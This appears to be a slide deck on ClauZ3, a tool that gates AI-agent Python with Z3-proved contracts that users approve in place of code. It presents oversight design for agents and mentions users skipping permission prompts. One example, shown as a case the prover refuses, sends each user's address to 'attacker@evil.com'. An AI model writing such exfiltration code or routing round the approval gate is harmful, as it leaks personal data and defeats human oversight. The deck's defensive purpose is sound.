ClauZ3

Static contracts for agent-authored Python

Asking users to consent to what an agent promises, not to a 200-line program they didn't read.

Part 1

The problem

The agent permission loop today

User: “Send a status email to bob@example.com about today's deploy.”

The agent emits a script, and the IDE asks the user to approve that:


import os, smtplib
from email.message import EmailMessage

def send(addr: str, body: str) -> None:
    msg = EmailMessage()
    msg["From"]    = os.environ.get("FROM_ADDR", "ops@example.com")
    msg["To"]      = addr
    msg["Subject"] = "Deploy update"
    msg.set_content(body)
    with smtplib.SMTP_SSL(os.environ["SMTP_HOST"]) as s:
        s.login(os.environ["SMTP_USER"], os.environ["SMTP_PASS"])
        s.send_message(msg)

changes = os.popen("git log --oneline -n 10").read()
body = f"Deploy notes:\n\n{changes}"

recipients = ["bob@example.com"] + os.environ.get("CC_LIST", "").split(",")
for r in recipients:
    if r.strip():
        send(r.strip(), body)
  

  ┌──────────────────────────────────────────────────────────────────┐
  │  Tool wants to run the script above.   Allow this? [y/N]         │
  └──────────────────────────────────────────────────────────────────┘

> User:  y    (eighth prompt this session)
  

The intent — "email Bob about the deploy" — is somewhere in there. So is whatever $CC_LIST resolves to, and whatever git log happens to print today. There is no declarative thing to consent to.

Security fatigue

  • Dozens of permission prompts per session
  • Each prompt: a few hundred lines of agent-generated code
  • The user is asked to audit what is fundamentally untrustworthy output
  • Most users: y to everything, or --dangerously-skip-permissions
The prompt asks the wrong question. Reviewing the program means reading every branch. No one does that, and the agent's code is the wrong artifact to anchor trust to in the first place.

Not “approve this 200-line program?”

But: will this email anyone other than Bob?

What users actually want to ask

  • Will this email anyone other than the address I named?
  • Will this email the same person twice?
  • Will this withdraw more than $5 total?
  • Will this write outside the sandbox?
  • Will this read any file under ~/.ssh?

These are contracts, not code reviews. They are small, declarative, and checkable.

Part 2

Background

Z3, in one slide

A constraint solver from Microsoft Research. Answers questions like:


  Given:   x > 5    and    x < 3
  Z3:      unsat — no value of x satisfies both.

  Given:   addr ∈ ["bob@example.com"]
            and the program calls send_email(addr)
            with addr = "ann@example.com"
  Z3:      sat — counterexample: addr = "ann@example.com"
  

You don't write Z3 directly. You compile high-level constraints into it and ask: is there any way for the program to violate them?

deal: Python runtime contracts

deal.readthedocs.io — a contract library for Python.


import deal

@deal.pre(lambda addr, msg: "@" in addr)
@deal.has("trusted")
@deal.post(lambda result: result is None)
def send_email(addr: str, msg: str) -> None:
    ...
  
  • @deal.pre — precondition (checked on call)
  • @deal.post — postcondition (checked on return)
  • @deal.has(...) — declares a side-effect category

deal is great. But it runs at runtime.

What deal can do

  • Catch a bad call when it happens
  • Document intent at the call site
  • Compose with property-based tests

What deal can't do before running

  • Catch the second email when the first already went out
  • Reject a program with a hidden bad branch
  • Give the user a contract to consent to up front

We want the same checks, discharged before any effect runs.

Part 3

ClauZ3

One run, end to end

UML sequence diagram: the user asks the agent to pay a card bill capped at $500; the agent submits a program plus guarantees to the ClauZ3 gate as a single tool call; the prover proves the spend stays under $500 on both branches and only the card is paid; the user approves only the guarantees; the runtime executes; the result returns up through the agent, which summarizes success.

One agentic tool call: the agent writes the code, the gate proves the guarantees, you approve the guarantees (not the code), then it runs.

The idea

Read deal's decorators statically, before any effect fires.


# trusted layer (audited; the assumptions)
@deal.pre(lambda addr, msg: "@" in addr)
@deal.has("trusted")
def send_email(addr: str, msg: str) -> None: ...


# agent code (untrusted; the guarantees)
import clauz3
from tools.email.trusted import contracts as emails

@clauz3.guarantee(emails.only(["bob@example.com"]))
def main() -> None:
    send_email("bob@example.com", "hi")
  

The prover compiles the guarantee into Z3 constraints and asks: any execution that violates it?

Three roles

RoleWritesTrusted for
User nothing the final decision; consents to a contract, never reads or runs code
Agent an ad-hoc program + @clauz3.guarantee(...) claims nothing — every claim must be proved
Trusted Layer Engineer the trusted layer: effects + contract vocabulary everything; this is the root of trust

Classic assume / guarantee reasoning. The TLE defines the assumptions; the agent states guarantees; the prover does the rest.

Part 4

Walkthrough

1 · A trusted email layer

The TLE writes this once. The agent and prover both read it.


# tools/email/trusted/effects.py
@deal.pre(lambda addr, msg: "@" in addr, message='addr must contain "@"')
@deal.has("trusted")
def send_email(addr: str, msg: str) -> None:
    ...

# tools/email/trusted/contracts.py
Email = effect("send_email")

@contract
def only(addresses: list[str]) -> ContractSpec:
    return Email.all(lambda e: e.addr in addresses)

@contract
def unique_recipients() -> ContractSpec:
    return Email.distinct(lambda e: e.addr)
  

2 · The agent writes a program

The user types something like:

"Send a status email to Bob."

The agent (an LLM) emits this program. The user does not read it.


import clauz3
from tools.email.trusted import contracts as emails
from tools.email.trusted.effects import send_email

@clauz3.guarantee(emails.only(["bob@example.com"]))
def main() -> None:
    send_email("bob@example.com", "Report is ready")
  

The decorator is the agent's claim about what the program will do. The body of main() is what it actually does. The prover's job is to check those agree.

3 · The agent asks the runner, "can I run this?"

The agent cannot import the trusted effect and call it directly. It has one allowed path: pipe the program to clauz3 run.


$ cat plan.py | clauz3 run

  prove        ✓ main: proved! assertion, guarantee
  submit       → approval-service at 127.0.0.1:8765
                request_id = clr_ab18711b7319
  wait         (pending user decision...)
  

The agent's harness allowlists clauz3 * only. Every other side-effect-capable command is denied. The agent cannot bypass the user.

4 · The user sees a contract — not code

The approval service shows up in the user's browser:


  ───────────────────────────────────────────────────────────
   Request   clr_ab18711b7319                    [pending]
   Target    main                       Coverage  covered
  ───────────────────────────────────────────────────────────

   Guarantees
     •  emails.only(['bob@example.com'])

   User decision
     Pending user decision.
     [ feedback / reason …………………………………………………………… ]
     [ Approve ]  [ Reject contract ]  [ Need more info ]  [ Reject ]

   Coverage
     ✓ email: covered

   ▸ Show source              (collapsed; rarely opened)
   ▸ Raw record JSON          (collapsed; for the auditor)
  ───────────────────────────────────────────────────────────
  

The contract is the unit of consent. Show source is right there for the rare audit, but it's not what the user is being asked to authorize.

5 · Approve → the program runs

The user clicks Approve. The runner unblocks, receives a receipt, and only now executes main().


  decision     approved_once
  receipt      local-clr_ab18711b7319

  execute      ✓ send_email("bob@example.com", "Report is ready")
  done.
  

PROVED the guarantee held against every branch before the user was asked. The user only had to consent to one declarative claim.

6 · And if the agent gets it wrong


@clauz3.guarantee(emails.only(["bob@example.com"]))
def main() -> None:
    send_email("ann@example.com", "Report is ready")
  

$ cat plan.py | clauz3 run

  prove        ✗ main: failed guarantee
                counterexample: addr = "ann@example.com"
  submit       (not submitted)
  

REFUSED The approval service never sees this request. The user is not bothered. send_email is never called.

The agent can lie, hallucinate, or just be wrong. The prover doesn't care about its prose — only whether the constraints hold.

7 · Aggregates: a bank example


@clauz3.guarantee(bank.max_spend(5))
def main() -> None:
    withdraw("checking", 2)
    withdraw("checking", 3)
  

PROVED sum is exactly 5, so sum ≤ 5 holds.


@clauz3.guarantee(bank.max_spend(5))
def main() -> None:
    withdraw("checking", 2)
    withdraw("checking", 4)
  

REFUSED sum is 6.

8 · Loops over typed query rows

The prover unrolls the loop symbolically and binds row.email to a column of a schema.


@clauz3.guarantee(emails.addresses_from(UserRow, "email"))
@clauz3.guarantee(emails.count_at_most(100))
def main() -> None:
    for row in db_query("users", where={"consented": True}):
        send_email(row.email, "Newsletter is out!")
  

PROVED every recipient is symbolically the email column of a UserRow.


def main() -> None:
    for row in db_query("users"):
        send_email("attacker@evil.com", row.email)   # leak
  

REFUSED recipient is a literal, not a column.

Part 5

The full flow

From "prove" to consent


                 ┌────────────────────────────────────────┐
                 │  Agent writes program + guarantees      │
                 └──────────────────┬─────────────────────┘
                                    │ clauz3 run
                                    ▼
                 ┌────────────────────────────────────────┐
                 │  Static prover · Z3                     │
                 │  Discharges every @clauz3.guarantee     │
                 └──────────────────┬─────────────────────┘
                                    │ if and only if proved
                                    ▼
                 ┌────────────────────────────────────────┐
                 │  Approval service (user-controlled)     │
                 │  Shows contracts, not code; records     │
                 │  decision + receipt                     │
                 └──────────────────┬─────────────────────┘
                                    │ if approved
                                    ▼
                 ┌────────────────────────────────────────┐
                 │  Program executes; trusted effects fire │
                 └────────────────────────────────────────┘
  

Coverage policies

The TLE declares what an agent should promise about a domain it uses.


# tools/email/trusted/policy.py
required    = []                       # must be present, or proof fails
recommended = ["only", "unique_recipients"]  # missing → UI badge, not block
  

The approval UI surfaces the gap:


  Coverage
  ── email: recommended_gap
       missing recommended: unique_recipients
  

Catches "the agent didn't lie, but also didn't promise anything useful."

Runtime fallback is allowed

Static proof is the default, not the only mode.

  • Some tasks are beyond any tractable static subset.
  • An agent can declare emails.no_guarantees() or leave a domain uncovered.
  • If the user accepts that contract, it's a recorded shared decision.
  • deal's runtime preconditions still fire at the trusted boundary. Same trusted layer, different posture.
Static when we can; runtime when the user accepts it. We don't get in the way of that agreement.
Part 6

Where it's going

What works today

  • clauz3 prove — discharge guarantees on an entry program
  • clauz3 run — prove · approve · execute
  • clauz3 approval-service — localhost UI, REST endpoints
  • clauz3 install — copy a trusted layer into another project
  • Worked examples: email, bank, email-from-db
  • Symbolic iteration over typed query rows
  • Coverage policies surfaced in the approval UI

Roadmap

  • Richer relation algebra — Datalog-style rules over effect facts; provenance.
  • Receipt enforcement inside trusted functions — trusted effects check the approval receipt at call time.
  • OWL / DL mapping — contracts as a description-logic vocabulary for cross-tool reuse.
  • Hardened sandbox for clauz3 run — beyond the current import-restricted runner.
  • More trusted layers — filesystem, HTTP, shell, databases, beyond email and bank.
  • Deterministic natural-language renderings of contracts for non-technical reviewers.

Built on

Layering on these projects, not replacing them.

Try it

github.com/normalform-ai/clauz3

Questions?